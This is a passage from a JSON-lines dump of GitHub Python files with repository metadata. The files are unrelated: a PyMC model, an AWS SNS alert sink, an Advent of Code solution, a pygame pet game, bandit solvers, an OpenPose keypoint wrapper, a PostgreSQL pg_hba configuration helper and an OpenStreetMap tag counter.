object)\n\n ## empty theta\n for i, j in enumerate(day):\n theta[i] = alpha + T.dot(state[i], beta.T)\n p_vec[i] = invlogit(theta[i])\n\n # Data likelihood\n track_lk[i] = pm.Dirichlet('track_lk',\n a=p_vec[i], shape=len(mtag[0]),\n observed=mtag[i])\n \nwith per_model:\n # start = pm.find_MAP()\n step = pm.Metropolis()\n nsteps = 1000\n trace = pm.sample(nsteps, step)\n","repo_name":"griverorz/lastfm","sub_path":"src/datamodel.py","file_name":"datamodel.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73027833013","text":"import base64\nimport collections\nimport json\nimport logging\nimport sys\n\nimport boto3\nimport botocore\n\nlogging.basicConfig()\nlogger = logging.getLogger('StreamAlert')\n\nclass SNSMessageSizeError(Exception):\n pass\n\nclass StreamSink(object):\n def __init__(self, alerts, config, env):\n self.alerts = alerts\n self.env = env\n self.variables = config['variables']\n\n def sink(self):\n \"\"\"Sink triggered alerts from the StreamRules engine.\n\n Group alerts to be sent to each sink, verifies that the\n sink exists in our configuration, and then sinks each\n group of alerts to the given SNS topic.\n\n Sends a message to SNS with the following JSON format:\n default: 'default',\n alerts: [\n 'rule_name': 'name',\n 'outputs': ['output1', 'output2'],\n 'payload': 'message_payload'\n ]\n \"\"\"\n def jdefault(obj):\n \"\"\"Helper method for marshalling custom objects to JSON\"\"\"\n return obj.__dict__\n\n snsDict = {'default': 'default', 'alerts': self.alerts}\n snsJsonMessage = json.dumps(snsDict, default=jdefault)\n encodedSnsMessage = base64.b64encode(snsJsonMessage)\n\n lambda_alias = self.env['lambda_alias']\n\n if lambda_alias == 'production':\n topic_arn = self._get_sns_topic_arn()\n client = boto3.client('sns', region_name=self.env['lambda_region'])\n self.publish_message(client, encodedSnsMessage, topic_arn)\n elif lambda_alias == 'staging':\n logger.info(json.dumps(snsDict, indent=2, default=jdefault))\n\n def _get_sns_topic_arn(self):\n \"\"\"Return a properly formatted SNS ARN.\n\n Args:\n region: Which AWS region the SNS topic exists in.\n topic: The name of the SNS topic.\n \"\"\"\n topic = '{}_monitoring'.format(self.env['lambda_function_name'])\n return 'arn:aws:sns:{region}:{account_id}:{topic}'.format(\n region=self.env['lambda_region'],\n account_id=self.env['account_id'],\n topic=topic\n )\n\n @staticmethod\n def _sns_message_size_check(message):\n \"\"\"Verify the SNS message is less than or equal to 256KB (SNS Limit)\n Args:\n message: A base64 encoded string of alerts to send to SNS.\n\n Returns:\n Boolean result of if the message is within the size constraint\n \"\"\"\n messageSize = float(sys.getsizeof(message)) / 1024\n return 0 < messageSize <= 256.0\n\n def publish_message(self, client, message, topic):\n \"\"\"Emit a message to SNS.\n\n Args:\n client: The boto3 client object.\n message: A JSON string containing all serialized alerts.\n topic: The SNS topic ARN to send to.\n \"\"\"\n if self._sns_message_size_check(message):\n try:\n response = client.publish(\n TopicArn=topic,\n Message=message,\n Subject='StreamAlert Rules Triggered'\n )\n except botocore.exceptions.ClientError as e:\n logging.error('An error occured while publishing Alert: %s', e.response)\n raise e\n logger.info('Published %i alert(s) to %s', len(self.alerts), topic)\n logger.info('SNS MessageID: %s', response['MessageId'])\n else:\n logging.error('Cannot publish 
Alerts, message size is too big!')\n raise SNSMessageSizeError('SNS message size is too big! (Max: 256KB)')\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/airbnb_streamalert/streamalert-master/stream_alert/sink.py","file_name":"sink.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"21114466844","text":"#!/usr/bin/python3\n\nimport sys\n\nls = [l.strip() for l in sys.stdin]\n\ndirs = {\n 'R': 1,\n 'L': -1,\n 'U': 1j,\n 'D': -1j,\n}\n\nseent = set()\nh = t = 0\nseent.add(0)\n\nfor c in ls:\n d = c[0]\n steps = int(c[1:])\n\n for s in range(0, steps):\n h += dirs[d]\n if abs(h.real - t.real) > 1:\n t += dirs[d]\n if t.imag != h.imag:\n t = complex(t.real, h.imag)\n elif abs(h.imag - t.imag) > 1:\n t += dirs[d]\n if t.real != h.real:\n t = complex(h.real, t.imag)\n\n seent.add(t)\n\nprint(len(seent))\n\n\n\n","repo_name":"jjpp/aoc","sub_path":"2022/09/tail.py","file_name":"tail.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42772808075","text":"import json\n\ncusto = 0\n\nwith open('estoque.json', 'r') as arquivo_json:\n conteudo = arquivo_json.read()\n dic = json.loads(conteudo)['produtos']\n for prod in dic:\n quantidade = int(prod['quantidade'])\n valor = float(prod['valor'])\n custo += quantidade*valor\n\nprint(custo)\n ","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_148/ch159_2020_06_28_00_06_41_947213.py","file_name":"ch159_2020_06_28_00_06_41_947213.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33682786977","text":"import os\n\n\ndef validate_argvs(argvs):\n args = []\n for arg in argvs:\n _, ext = os.path.splitext(arg)\n if ext in ['.csv', '.xlsx', '.xls']:\n args.append(arg)\n \n if len(args) < 2:\n raise ValueError('Needed two of excel or csv file')\n return args[:2]\n","repo_name":"zwolf21/xldiff","sub_path":"xldiff/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12493882850","text":"import pygame, os\nimport time\nfrom mainConst import action, tamagotchiJump, pixel_font, screen\nfrom abs_path import abs_path\n\npygame.init()\n\nanimCount = 0\ntimeCount = 60\nscoreCount = 0\nseconds = 1\nclicked_play = False\n\n\nclass Play:\n def __init__(self):\n self.x = 325\n self.y = 400\n self.width = 150\n self.height = 150\n self.background_anim = [pygame.transform.scale(pygame.image.load(abs_path('images/backgrounds/background-0.png')), (800, 500)),\n pygame.transform.scale(pygame.image.load(abs_path('images/backgrounds/background-1.png')), (800, 500)),\n pygame.transform.scale(pygame.image.load(abs_path('images/backgrounds/background-2.png')), (800, 500)),\n pygame.transform.scale(pygame.image.load(abs_path('images/backgrounds/background-3.png')), (800, 500))]\n self.exit = pygame.transform.scale(pygame.image.load(abs_path('images/sprites/iconCross_beige.png')), (40, 40))\n self.exit_rect = self.exit.get_rect(center=(40, 40))\n\n def blit_play(self):\n global animCount\n if clicked_play:\n if animCount + 1 >= len(self.background_anim) * 7:\n animCount = 0\n screen.blit(self.background_anim[0], (0, 0))\n screen.blit(tamagotchiJump[0], (self.x, self.y))\n else:\n 
screen.blit(self.background_anim[animCount // 7], (0, 0))\n screen.blit(tamagotchiJump[animCount // 7], (self.x, self.y))\n animCount += 1\n\n time_left = pixel_font.render(f'Time Left: {timeCount}', True, (255, 255, 255))\n score = pixel_font.render(f'Score: {scoreCount}', True, (255, 255, 255))\n screen.blit(score, (600, 20))\n screen.blit(time_left, (600, 60))\n screen.blit(self.exit, self.exit_rect)\n\n def check_time(self, game_time):\n global clicked_play, timeCount, scoreCount, seconds\n t_time = time.time() - game_time\n if seconds < t_time:\n timeCount -= 1\n seconds += 1\n if timeCount == 0:\n action['logiki'] += scoreCount // 2\n if action['happy'] + 15 > 100:\n score = 100 - action['happy']\n action['happy'] += score\n else:\n action['happy'] += 15\n action['satiety'] -= 2\n clicked_play = False\n timeCount = 60\n seconds = 1\n scoreCount = 0\n pygame.mixer.music.unload()\n pygame.mixer.music.load(abs_path('sounds/backgroundMusic.ogg'))\n pygame.mixer.music.play(loops=-1)\n\n def control(self, keys):\n if keys[pygame.K_LEFT] and self.x > 1:\n self.x -= 7\n if keys[pygame.K_RIGHT] and self.x < 800 - self.width:\n self.x += 7\n\n\nclass Basket(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.basket = pygame.transform.scale(pygame.image.load(abs_path('images/sprites/basket.png')), (150 // 2, 150 // 3))\n self.rect = self.basket.get_rect(center=(400, 440))\n\n def blit_basket(self):\n screen.blit(self.basket, self.rect)\n\n def control(self, keys):\n if keys[pygame.K_LEFT] and self.rect.x > 35:\n self.rect.x -= 7\n if keys[pygame.K_RIGHT] and self.rect.x < 690:\n self.rect.x += 7\n\n\nclass Coin(pygame.sprite.Sprite):\n def __init__(self, x, speed, filename, group):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.transform.scale(pygame.image.load(filename), (30, 30))\n self.rect = self.image.get_rect(center=(x, 0))\n self.speed = speed\n self.add(group)\n\n def update(self, height):\n if self.rect.y < height - 20:\n self.rect.y += self.speed\n else:\n self.kill()\n","repo_name":"YarikHrabovets/tamagotchi","sub_path":"playClass.py","file_name":"playClass.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"10835707668","text":"from Classes_RL.Boltzmann_solver import Boltzmann, BoltzmannStationary, BoltzmannNonStationary, BoltzmannUCBStationary, BoltzmannUCBNonStationary, BoltzmannSlidingWindowUCB\nfrom Classes_RL.Bayesian_solver import Bayesian, BayesianStationaryUMUV, BayesianNonStationaryUMUV, BayesianStationaryUMKV, BayesianNonStationaryUMKV\nfrom Classes_RL.Bayesian_sliding_solver import BayesianSlidingWindowUMKV, BayesianSlidingWindowUMUV\nfrom Classes_RL.Kalman_filter_solver import Kalman, KalmanGreedy, KalmanEpsilonGreedy, KalmanUCB, KalmanSoftmax, KalmanUCBSoftmax, KalmanThompsonGreedy, KalmanThompsonSoftmax\nfrom Classes_RL.Interfaces import Solver\nfrom Classes_RL.Bandit import Bandit\nfrom typing import List\n\nclass Models:\n\n Boltzmann_stationary = \"boltzmann_stationary\" # Not coded\n Boltzmann_UCB_stationary = \"boltzmann_UCB_stationary\" # Not coded\n Boltzmann_non_stationary = \"boltzmann_non_stationary\" # Not coded\n Boltzmann_UCB_non_stationary = \"boltzmann_UCB_non_stationary\" # Not coded\n\n Boltzmann_UCB_sliding = \"boltzmann_UCB_sliding_non_stationary\"\n\n Kalman_greedy = \"kalman_greedy\" # Coded\n Kalman_e_greedy = \"kalman_e_greedy\" # Coded\n Kalman_UCB = \"kalman_UCB\" # Coded\n Kalman_softmax = 
\"kalman_softmax\" # Coded\n Kalman_UCB_softmax = \"kalman_UCB_softmax\" # Coded\n Kalman_Thompson_greedy = \"kalman_filter_Thompson_argmax\" # Coded\n Kalman_Thompson_softmax = \"kalman_filter_Thompson_softmax\" # Coded\n\n # Bayesian_um_kv_greedy_stationary = \"bayesian_um_kv_greedy_stationary\" # Not coded\n # Bayesian_um_uv_greedy_stationary = \"bayesian_um_uv_greedy_stationary\" # Not coded\n Bayesian_um_kv_softmax_stationary = \"bayesian_um_kv_softmax_stationary\" # Coded\n Bayesian_um_uv_softmax_stationary = \"bayesian_um_uv_softmax_stationary\" # Coded\n\n # Bayesian_um_kv_greedy_non_stationary = \"bayesian_um_kv_greedy_non_stationary\" # Not coded\n # Bayesian_um_uv_greedy_non_stationary = \"bayesian_um_uv_greedy_non_stationary\" # Not coded\n Bayesian_um_kv_softmax_non_stationary = \"bayesian_um_kv_softmax_non_stationary\" # Coded\n Bayesian_um_uv_softmax_non_stationary = \"bayesian_um_uv_softmax_non_stationary\" # Coded\n\n # Bayesian_um_kv_greedy_sliding_non_stationary = \"bayesian_um_kv_greedy_sliding_non_stationary\" # Not coded\n # Bayesian_um_uv_greedy_sliding_non_stationary = \"bayesian_um_uv_greedy_sliding_non_stationary\" # Not coded\n Bayesian_um_kv_softmax_sliding_non_stationary = \"bayesian_um_kv_softmax_sliding_non_stationary\" # Coded\n Bayesian_um_uv_softmax_sliding_non_stationary = \"bayesian_um_uv_softmax_sliding_non_stationary\" # Coded\n\n# print(Models.Boltzmann_stationary, Models.Boltzmann_UCB_stationary, Models.Boltzmann_non_stationary, Models.Boltzmann_UCB_non_stationary,\n# Models.Kalman_greedy, Models.Kalman_e_greedy, Models.Kalman_UCB, Models.Kalman_softmax, Models.Kalman_UCB_softmax, Models.Kalman_Thompson_greedy, Models.Kalman_Thompson_softmax,\n# Models.Bayesian_um_kv_greedy_stationary, Models.Bayesian_um_uv_greedy_stationary, Models.Bayesian_um_kv_softmax_stationary, Models.Bayesian_um_uv_softmax_stationary,\n# Models.Bayesian_um_kv_greedy_non_stationary, Models.Bayesian_um_uv_greedy_non_stationary, Models.Bayesian_um_kv_softmax_non_stationary, Models.Bayesian_um_uv_softmax_non_stationary,\n# Models.Bayesian_um_kv_greedy_sliding_non_stationary, Models.Bayesian_um_uv_greedy_sliding_non_stationary, Models.Bayesian_um_kv_softmax_sliding_non_stationary, Models.Bayesian_um_uv_softmax_sliding_non_stationary)\n\nclass SolverFactory():\n\n def create(self, bandits: List[Bandit], oracle_data: dict, n_episode: int, hyper_model: dict) -> Solver:\n\n # print(\"SolverFactory: \" + str(hyper_model))\n solver_name = hyper_model[\"solver_name\"]\n # print(solver_name)\n\n # print(solver_name == Models.Boltzmann_non_stationary)\n\n arguments = {\"bandits\": bandits,\n \"oracle_data\": oracle_data,\n \"n_iteration\": bandits[0].get_n_iteration(),\n \"n_episode\": n_episode}\n\n # ------- Boltzmann -------\n\n if solver_name == Models.Boltzmann_stationary:\n\n solver = BoltzmannStationary(**arguments)\n\n elif solver_name == Models.Boltzmann_UCB_stationary:\n\n solver = BoltzmannUCBStationary(**arguments)\n\n elif solver_name == Models.Boltzmann_non_stationary:\n\n solver = BoltzmannNonStationary(**arguments)\n\n elif solver_name == Models.Boltzmann_UCB_non_stationary:\n\n solver = BoltzmannUCBNonStationary(**arguments)\n\n # -------- Boltzmann - Sliding window -------\n\n elif solver_name == Models.Boltzmann_UCB_sliding:\n\n solver = BoltzmannSlidingWindowUCB(**arguments)\n\n # --------- Kalman -------\n\n elif solver_name == Models.Kalman_greedy:\n\n solver = KalmanGreedy(**arguments)\n\n elif solver_name == Models.Kalman_e_greedy:\n\n solver = 
KalmanEpsilonGreedy(**arguments)\n\n elif solver_name == Models.Kalman_UCB:\n\n solver = KalmanUCB(**arguments)\n\n elif solver_name == Models.Kalman_softmax:\n\n solver = KalmanSoftmax(**arguments)\n\n elif solver_name == Models.Kalman_UCB_softmax:\n\n solver = KalmanUCBSoftmax(**arguments)\n\n elif solver_name == Models.Kalman_Thompson_greedy:\n\n solver = KalmanThompsonGreedy(**arguments)\n\n elif solver_name == Models.Kalman_Thompson_softmax:\n\n solver = KalmanThompsonSoftmax(**arguments)\n\n # ------- Bayesian (Thompson Sampling) --------\n\n elif solver_name == Models.Bayesian_um_kv_softmax_stationary:\n\n solver = BayesianStationaryUMKV(**arguments)\n\n elif solver_name == Models.Bayesian_um_uv_softmax_stationary:\n\n solver = BayesianStationaryUMUV(**arguments)\n\n elif solver_name == Models.Bayesian_um_kv_softmax_non_stationary:\n\n solver = BayesianNonStationaryUMKV(**arguments)\n\n elif solver_name == Models.Bayesian_um_uv_softmax_non_stationary:\n\n solver = BayesianNonStationaryUMUV(**arguments)\n\n # ------- Bayesian - Sliding window -------\n\n elif solver_name == Models.Bayesian_um_kv_softmax_sliding_non_stationary:\n\n solver = BayesianSlidingWindowUMKV(**arguments)\n\n elif solver_name == Models.Bayesian_um_uv_softmax_sliding_non_stationary:\n\n solver = BayesianSlidingWindowUMUV(**arguments)\n\n else:\n\n solver = None\n\n solver.set_hyperparameters(hyper_model)\n\n return solver","repo_name":"KentaKamikokuryo/Bandits_AAE_Handrecognition","sub_path":"Python/Classes_RL/SolverFactory.py","file_name":"SolverFactory.py","file_ext":"py","file_size_in_byte":6578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36446804931","text":"import argparse\nimport numpy as np\nfrom time import time\nfrom datetime import timedelta\nimport os\nimport matplotlib.pyplot as plt\nimport logging\nimport cv2\nimport h5py\nimport json\n\nlogging.basicConfig(format=\"%(asctime)s %(levelname)s: %(message)s\",\n\t\t\t\t\tlevel=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nclass TwoDKeyPoints:\n\t\"\"\"\n\tClass for point clouds Iterative Closest Point (ICP) implementation with\n\topen3d.\n\t\"\"\"\n\tcoco_pose_pairs = [[1,0],[1,2],[1,5],[2,3],[3,4],[5,6],\n\t\t\t\t\t [6,7],[1,8],[8,9],[9,10],[1,11],[11,12],\n\t\t\t\t\t [12,13],[0,14],[0,15],[14,16],[15,17]]\n\tcoco_key_points = [\n\t\t\t\"nose\", \"left_eye\", \"right_eye\", \"left_ear\", \"right_ear\",\n\t\t\t\"left_shoulder\", \"right_shoulder\", \"left_elbow\", \"right_elbow\",\n\t\t\t\"left_wrist\", \"right_wrist\", \"left_hip\", \"right_hip\", \"left_knee\",\n\t\t\t\"right_knee\", \"left_ankle\", \"right_ankle\"]\n\tnpoints = 18\n\t\n\tdef __init__(self, config={\n\t\t\"proto\": \"openpose/models/pose/coco/pose_deploy_linevec.prototxt\",\n\t\t\"weight\": \"openpose/models/pose/coco/pose_iter_440000.caffemodel\"}):\n\t\t\"\"\"\n\t\tInitialization.\n\t\t\n\t\tParameters:\n\t\t\tfilenames, list of str, full path to the filnames of the input point\n\t\t\t\tclouds\n\t\tCoCo key points:\n\t\t\t\"nose\", \"left_eye\", \"right_eye\", \"left_ear\", \"right_ear\",\n\t\t\t\"left_shoulder\", \"right_shoulder\", \"left_elbow\", \"right_elbow\",\n\t\t\t\"left_wrist\", \"right_wrist\", \"left_hip\", \"right_hip\", \"left_knee\",\n\t\t\t\"right_knee\", \"left_ankle\", \"right_ankle\"\n\t\t\"\"\"\n\t\tself.config = config\n\n\tdef _load_network(self):\n\t\t\"\"\"\n\t\tload the network if it is needed for inference\n\t\t\"\"\"\n\t\tassert \"proto\" in self.config, \"proto file not 
found!\"\n\t\tassert \"weight\" in self.config, \"weight file not found!\"\n\t\tself.prob_threshold = self.config.get(\"prob_threshold\", 0.5)\n\t\t# Read the network into Memory\n\t\tself.network = cv2.dnn.readNetFromCaffe(self.config[\"proto\"], self.config[\"weight\"])\n\t\tlogger.info(\"Load proto file: %s\" % (self.config[\"proto\"]))\n\t\tlogger.info(\"Load weight file: %s\" % (self.config[\"weight\"]))\n\n\t@staticmethod\n\tdef _get_frame(image_path):\n\t\tassert os.path.exists(image_path), \"%s not found\" % image_path\n\t\treturn cv2.imread(image_path)\n\n\tdef inference(self, image, out_path=None):\n\t\t\"\"\"\n\t\tMake inference of the 2d key points model\n\t\tParameters:\n\t\t\timage: str of image path, or np.array as image\n\t\t\"\"\"\n\t\tif not hasattr(self, \"network\"):\n\t\t\tself._load_network()\n\n\t\tself.frame = self._get_frame(image) if isinstance(image, str) else image\n\t\theight, width = self.frame.shape[0], self.frame.shape[1]\n\t\tprint(\"height\", height, \"width\", width)\n\t\tinputblob = cv2.dnn.blobFromImage(\n\t\t\t\t\tself.frame, 1.0 / 255, (width, height), (0, 0, 0), swapRB=False, crop=False)\n\t\tself.network.setInput(inputblob)\n\t\toutput = self.network.forward()\n\t\tself.keypoints = self._get_keypoints(output, width, height)\n\t\tlogger.info(\"Detected keypoints: %s\" % str(self.keypoints))\n\t\tkpdict = {key: p for key, p in zip(self.coco_key_points, self.keypoints) if p is not None}\n\t\tif out_path is not None:\n\t\t\toutdir = os.path.dirname(out_path)\n\t\t\tos.makedirs(outdir, exist_ok=True)\n\t\t\twith open(out_path, \"w\") as f:\n\t\t\t\tjson.dump(kpdict, f, indent=4 )\n\t\t\tlogger.info(\"output file saved to: %s\" % out_path)\n\t\tlogger.info(\"detected keypoints: %s\" % str(kpdict))\n\t\treturn kpdict\n\n\tdef _get_keypoints(self, output, width, height):\n\t\tprint(\"kp output shape\", output.shape)\n\t\tout_h = output.shape[2]\n\t\tout_w = output.shape[3]\n\t\tprint(\"output height\", out_h, \"width\", out_w)\n\n\t\t# Empty list to store the detected keypoints\n\t\tpoints = []\n\t\tfor i in range(self.npoints):\n\t\t\t# confidence map of corresponding body's part.\n\t\t\tprobMap = output[0, i, :, :]\n\t\t\t# Find global maxima of the probMap.\n\t\t\tminVal, prob, minLoc, point = cv2.minMaxLoc(probMap)\n\n\t\t\t# Scale the point to fit on the original image\n\t\t\tx = (width * point[0]) / out_w\n\t\t\ty = (height * point[1]) / out_h\n\n\t\t\tprint (\"index\", i, \"prob\", prob)\n\t\t\tif prob > self.prob_threshold:\n\t\t\t\t# Add the point to the list if the probability is greater than the threshold\n\t\t\t\tpoints.append((int(x), int(y)))\n\t\t\telse:\n\t\t\t\tpoints.append(None)\n\t\treturn points\n\n\tdef draw(self, outname):\n\n\t\tframecopy = np.copy(self.frame)\n\t\tfor idx, p in enumerate(self.keypoints):\n\t\t\tif p is None: continue\n\t\t\tcv2.circle(framecopy, p, 15, (0, 255, 255),\n thickness=-1, lineType=cv2.FILLED)\n\t\t\tcv2.putText(framecopy, \"{}\".format(idx),\n p, cv2.FONT_HERSHEY_SIMPLEX, 1.4,\n\t\t\t\t\t\t\t(0, 0, 255), 3, lineType=cv2.LINE_AA)\n\n\t\tfor pair in self.coco_pose_pairs:\n\t\t\tpartA = pair[0]\n\t\t\tpartB = pair[1]\n\n\t\t\tif self.keypoints[partA] and self.keypoints[partB]:\n\t\t\t\tcv2.line(framecopy, self.keypoints[partA], self.keypoints[partB], (0, 255, 0), 3)\n\t\tcv2.imwrite(outname)\n\t\tlogger.info(\"Save rgbd image: %s\" % outname)\n\n\t@staticmethod\n\tdef load_h5(filename):\n\t\t\"\"\"\n\t\tLoad key points from 2d key points module in the pipeline\n\t\tThere are 17 key points:\n\t\t\t['nose', 
'left_eye', 'right_eye', 'left_ear', 'right_ear',\n\t\t\t'left_shoulder', 'right_shoulder', 'left_elbow', 'right_elbow',\n\t\t\t'left_wrist', 'right_wrist', 'left_hip', 'right_hip', 'left_knee',\n\t\t\t'right_knee', 'left_ankle', 'right_ankle']\n\t\t\"\"\"\n\t\tassert os.path.exists(filename), \"%s not found\" % filename\n\t\tkpdict = {}\n\t\twith h5py.File(filename, \"r\") as h5:\n\t\t\t# key points names\n\t\t\tnames = [name.decode('ascii') for name in np.array(h5[\"info\"][\"twoD_keypoints\"])]\n\t\t\tfor name in h5[\"data\"]:\n\t\t\t\t# rename\n\t\t\t\tif name[0:5] != \"frame\": continue\n\t\t\t\tidx = int(name[5:])\n\t\t\t\t# np.array(h5[\"data\"][name]) has 17 x 3 array... with float\n\t\t\t\t# need to save 17 x 2 with int\n\t\t\t\tkps = []\n\t\t\t\tfor p in np.array(h5[\"data\"][name]):\n\t\t\t\t\t# fix: build the [x, y] pair first, then append once (the old expression appended inside the conditional and then appended None again)\n\t\t\t\t\tkp = None if np.any(np.isnan(p)) else [int(p[0]), int(p[1])]\n\t\t\t\t\tkps.append(kp)\n\t\t\t\tkpdict[\"FRAME%04d\" % idx] = {name: kps[i] for i, name in enumerate(names)}\n\t\t\t\tlogger.info(\"loaded kp for %s\" % name)\n\t\treturn kpdict\n\ndef main():\n\tt_start = time()\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\n\t\t\"--input\", \"-i\", default=None, type=str, required=True,\n\t\thelp=\"Your input point cloud file.\",\n\t)\n\tparser.add_argument(\n\t\t\"--outdir\", \"-o\", default=\"outputs/keypoints\", type=str, required=False,\n\t\thelp=\"Your output folder.\",\n\t)\n\n\targs = parser.parse_args()\n\tlogger.info(\"Reading input file: %s\" % args.input)\n\tsc = TwoDKeyPoints()\n\tbasename = os.path.splitext(os.path.basename(args.input))[0]\n\tprint(\"basename\", basename)\n\tsc.inference(args.input, os.path.join(args.outdir, basename+\"_keypoints.json\"))\n\t# sc.draw(os.path.join(args.outdir, basename+\"_out.png\"))\n\ttdif = time() - t_start\n\tlogger.info(\"Time used: %s\" % str(timedelta(seconds=tdif)))\n\n\nif __name__ == \"__main__\":\n\t\"\"\"\n\tExecute example:\n\t\tpython3 pointcloudstransformation.py \\\n\t\t\t-i outputs/point_clouds/FRAME0000.ply \\\n\t\t\t-o /path/to/output/output_transformed\n\t\"\"\"\n\tmain()\n","repo_name":"jieyu11/PointCloudsConversion","sub_path":"twodkeypoints.py","file_name":"twodkeypoints.py","file_ext":"py","file_size_in_byte":6729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40049320353","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport re\n\n\ndef fmt_line(user, dbtype):\n    if dbtype == \"local\":\n        return \"local\\tall\\t\\t%s\\t\\t\\t\\t\\ttrust\" % user\n    elif dbtype == \"ipv4\":\n        return \"host\\tall\\t\\t%s\\t\\t127.0.0.1/32\\t\\ttrust\" % user\n    elif dbtype == \"ipv6\":\n        return \"host\\tall\\t\\t%s\\t\\t::1/128\\t\\t\\ttrust\" % user\n    return \"###### INVALID LINE\"\n\n\ndef do_conf_pg(ffn):\n    found_tag = False\n    done = False\n    target = []\n    # import pdb; pdb.set_trace()\n    with open(ffn, \"r\") as fd:\n        lines = fd.read().split(\"\\n\")\n        for nro, line in enumerate(lines):\n            if re.match(r\"^[\\s]*local[\\s]*all[\\s]*postgres\", line):\n                found_tag = True\n            elif found_tag and re.match(r\"^[\\s]*local[\\s]*all[\\s]\", line):\n                if not done:\n                    for role in (\"odoo\", \"oca\"):\n                        for version in (\n                            \"\",\n                            \"6\",\n                            \"7\",\n                            \"8\",\n                            \"9\",\n                            \"10\",\n                            \"11\",\n                            \"12\",\n                            \"13\",\n                            \"14\",\n                            \"15\",\n                            \"16\",\n                            \"_www\",\n                        ):\n                            if role == \"oca\" and version in (\"\", \"6\"):\n                                continue\n                            target.append(fmt_line(\"%s%s\" % (role, version), \"local\"))\n                            target.append(fmt_line(\"%s%s\" % (role, version), 
\"ipv4\"))\n target.append(fmt_line(\"%s%s\" % (role, version), \"ipv6\"))\n target.append(fmt_line(\"weblate\", \"local\"))\n target.append(fmt_line(\"weblate\", \"ipv4\"))\n target.append(fmt_line(\"weblate\", \"ipv6\"))\n target.append(fmt_line(\"kalamitica\", \"local\"))\n target.append(fmt_line(\"kalamitica\", \"ipv4\"))\n target.append(fmt_line(\"kalamitica\", \"ipv6\"))\n done = True\n continue\n target.append(line)\n\n if found_tag:\n bakfile = \"%s.bak\" % ffn\n if os.path.isfile(bakfile):\n os.remove(bakfile)\n if os.path.isfile(ffn):\n os.rename(ffn, bakfile)\n with open(ffn, \"w\") as fd:\n fd.write(\"\\n\".join(target))\n print(ffn)\n\n\ndef main(argv):\n argv = argv or sys.argv[1:]\n path = None\n for param in argv:\n if param.startswith(\"-\"):\n pass\n else:\n path = os.path.expanduser(param)\n if not path:\n print(\"No path supplied! Use %s PATH\" % sys.argv[0])\n return 1\n if os.path.isdir(path):\n print(\"Supplied path is not a file\")\n return 1\n elif os.path.isfile(path):\n do_conf_pg(path)\n else:\n print(\"Path %s does not exist!\" % sys.argv[0])\n return 2\n return 0\n\n\nif __name__ == \"__main__\":\n exit(main(None))\n","repo_name":"zeroincombenze/tools","sub_path":"wok_code/pgconf.py","file_name":"pgconf.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"35663390935","text":"import sys\nsys.stdin = open(\"sample_input_sum.txt\")\n\nT = int(input())\n\nfor tc in range(T):\n N, M = map(int, input().split())\n list_num = list(map(int, input().split()))\n max_sum = -float(\"inf\")\n min_sum = float(\"inf\")\n\n for i in range(0, N+1 - M):\n each = 0 # 부분합을 받는 변수.\n for j in range(M):\n each += list_num[i+j] # i는 현재 인덱스, j는 부분합을 구성하는 부분들의 수.\n if each > max_sum: # 특정 부분합이 가장 크다면 새로운 부분합의 최대값이 된다.\n max_sum = each\n if each < min_sum: # 특정 부분합이 가장 작다면 새로운 부분합의 최소값이 된다.\n min_sum = each\n print(f\"#{tc+1} {max_sum - min_sum}\")","repo_name":"gogumasitda/TIL","sub_path":"algorithm/01.15/sum.py","file_name":"sum.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"75060812211","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport xml.etree.cElementTree as ET\nimport pprint\n\nfrom collections import defaultdict\nimport re\nfilename = 'FTWORTH.xml'\n\n\n# In[2]:\n\n\ndef count_tags(filename):\n tag_count = {}\n for event, element in ET.iterparse(filename, events=(\"start\",)):\n add_tag(element.tag, tag_count)\n return tag_count\n\ndef add_tag(tag, tag_count):\n if tag in tag_count:\n tag_count[tag] += 1\n else:\n tag_count[tag] = 1\n\n\ndef test():\n\n tags = count_tags(filename)\n pprint.pprint(tags)\n assert tags == {\n 'bounds': 1,\n 'member': 9228,\n 'meta': 1,\n 'nd': 346342,\n 'node': 307175,\n 'note': 1,\n 'osm': 1,\n 'relation': 109,\n 'tag': 133992,\n 'way': 35600}\n\n\n \nif __name__ == \"__main__\":\n test()\n\n\n# In[3]:\n\nlower = re.compile(r'^([a-z]|_)*$')\nlower_colon = re.compile(r'^([a-z]|_)*:([a-z]|_)*$')\nproblemchars = re.compile(r'[=\\+/&<>;\\'\"\\?%#$@\\,\\. 
